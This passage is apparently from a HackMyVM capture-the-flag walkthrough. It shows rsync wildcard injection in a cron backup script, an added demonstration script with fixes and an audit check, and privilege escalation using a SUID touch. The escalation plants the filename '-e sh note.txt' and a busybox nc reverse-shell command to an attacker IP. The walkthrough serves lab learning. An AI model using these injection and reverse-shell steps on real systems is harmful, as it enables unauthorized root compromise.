chmod 644 "$LOG_FILE"

# Run rsync directly (the unquoted *.txt glob is expanded by the shell here)
echo "Ejecutando backup de archivos .txt..."
rsync -e "ssh -i /home/backupusr/.ssh/id_ed25519" -av *.txt "$BACKUP_DIR/"

# Confirm the log file
if [ -f "$LOG_FILE" ]; then
    echo "Backup completado. Comando guardado en: $LOG_FILE"
    ls -la "$LOG_FILE"
    echo "Contenido del log:"
    cat "$LOG_FILE"
fi

exit 0

OK, this is the cron job we got our shell from.

But we cannot read root's backups.sh.
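Added example, not from the original write-up, to make the wildcard injection in backups.sh concrete: a constructed temp directory that mimics /srv/platform/appdata/exports after the `touch "./-e sh shell.txt"` step, a stand-in for a getopt/popt-style parser that counts which expanded arguments would be taken as options, the bare `*.txt` expansion from the script, the two hardened forms (`./*.txt` and `--`), and a defender's check for option-shaped filenames. No rsync runs and nothing is synced.

```shell
#!/bin/sh
# Added example (not part of the original write-up): why the cron job's
#   rsync -e "ssh -i ..." -av *.txt "$BACKUP_DIR/"
# is injectable, and what the hardened globs look like. All paths live in a
# constructed temp directory; no rsync runs and nothing is synced.

# Build a directory that mimics /srv/platform/appdata/exports after the
# `touch "./-e sh shell.txt"` step: two legitimate reports, the payload file
# and the option-shaped filename.
make_fixture() {
    d=$(mktemp -d)
    printf 'report\n' > "$d/report_20260404_024041_7a6e1f.txt"
    printf 'report\n' > "$d/report_20260404_024052_3606d7.txt"
    printf 'echo payload\n' > "$d/shell.txt"   # constructed stand-in for the payload
    : > "$d/-e sh shell.txt"                   # empty; only its name matters
    printf '%s' "$d"
}

# Stand-in for a getopt/popt-style parser such as rsync's: counts arguments
# that would be taken as options (they start with '-') and stops at '--'.
count_option_like() {
    n=0
    for a in "$@"; do
        case $a in
            --) break ;;
            -*) n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Vulnerable form: the bare *.txt from backups.sh. The shell expands the glob
# before rsync starts, so "-e sh shell.txt" arrives as an -e option and rsync
# would run `sh shell.txt` as its remote-shell command.
unsafe_option_count() {
    ( cd "$1" && count_option_like *.txt )
}

# Hardened form 1: anchor the glob with ./ so every match begins with "./"
# and can never be mistaken for an option.
safe_option_count_dotslash() {
    ( cd "$1" && count_option_like ./*.txt )
}

# Hardened form 2: end option parsing with "--" before the glob.
safe_option_count_dashdash() {
    ( cd "$1" && count_option_like -- *.txt )
}

# Defender's check: a directory consumed by a cron glob should never contain
# names beginning with '-'. Returns how many such entries exist at top level.
count_option_shaped_names() {
    find "$1" -maxdepth 1 -name '-*' | wc -l | tr -d ' '
}

demo() {
    d=$(make_fixture)
    echo "bare *.txt -> $(unsafe_option_count "$d") option-like argument(s)"
    echo "./*.txt    -> $(safe_option_count_dotslash "$d")"
    echo "-- *.txt   -> $(safe_option_count_dashdash "$d")"
    echo "audit      -> $(count_option_shaped_names "$d") option-shaped filename(s)"
    rm -rf "$d"
}

if [ "${DEMO:-0}" = 1 ]; then
    demo
fi
```

Run with `DEMO=1 sh wildcard.sh` to see the counts; the one-line fix for the cron script is `rsync -e "ssh -i /home/backupusr/.ssh/id_ed25519" -av ./*.txt "$BACKUP_DIR/"`, and the same `./` anchoring applies to the root-owned /opt/registry job that the SUID touch is used against later.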

backupusr@latestwasalie:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/touch
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn

touch is SUID, so we can create files as root.

So the root technique is probably the same as the user one: write to some file and let a wildcard trigger it.

Find the files we have write access to

backupusr@latestwasalie:~$ find / -writable 2>/dev/null | grep -v -E '(proc|sys|dev|tmp|run)'
/srv/platform/appdata/exports
/srv/platform/appdata/exports/.rsync_cmd
/var/lock
/opt/registry/note.txt
/home/backupusr
/home/backupusr/.bashrc
/home/backupusr/.bash_history
/home/backupusr/backups.sh
/home/backupusr/.lesshst
/home/backupusr/.local
/home/backupusr/.local/share
/home/backupusr/.local/share/nano
/home/backupusr/pspy64
/home/backupusr/.selected_editor
/home/backupusr/.ssh
/home/backupusr/.ssh/config
/home/backupusr/.ssh/known_hosts
/home/backupusr/.ssh/authorized_keys
/home/backupusr/.ssh/id_ed25519.pub
/home/backupusr/.ssh/id_ed25519
/home/backupusr/.ssh/known_hosts.old
/home/backupusr/backup
/home/backupusr/backup/report_20260404_024115_a9301d.txt
/home/backupusr/backup/report_20260404_024052_3606d7.txt
/home/backupusr/backup/report_20260404_024105_d10ac5.txt
/home/backupusr/backup/fake.txt
/home/backupusr/backup/report_20260404_024041_7a6e1f.txt
/home/backupusr/.bash_logout
/home/backupusr/.gnupg
/home/backupusr/.gnupg/public-keys.d
/home/backupusr/.gnupg/trustdb.gpg
/home/backupusr/.gnupg/private-keys-v1.d
/home/backupusr/.gnupg/crls.d
/home/backupusr/.gnupg/crls.d/DIR.txt
/home/backupusr/.gnupg/pubring.kbx
/home/backupusr/.profile

Hm? Why can we write to a file under /opt?

backupusr@latestwasalie:~$ cat /opt/registry/note.txt
Docker registry service
backupusr@latestwasalie:~$ ls /opt/registry/
auth config data docker-compose.yml note.txt

Never mind; write a reverse-shell command into it first and plant the option-shaped filename next to it.

backupusr@latestwasalie:~$ echo "busybox nc 192.168.56.104 4444 -e sh" > /opt/registry/note.txt
backupusr@latestwasalie:~$ chmod +x /opt/registry/note.txt
chmod: cambiando los permisos de '/opt/registry/note.txt': Operación no permitida
backupusr@latestwasalie:~$ touch /opt/registry/'-e sh note.txt'
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444127.0.0.1192.168.21.128192.168.56.104192.168.10.150172.17.0.1172.18.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.56.104:4444
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/latestwasalie~192.168.56.51_Linux_x86_64/2026_04_17-15_29_03-014.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@latestwasalie:/opt/registry#

Done.

A pretty good box. Supply-chain poisoning is something you rarely run into, and I learned something this time.


Author: Skyarrow
Posted on: April 17, 2026
http://example.com/2026/04/17/HackMyVM-Latestwasalie/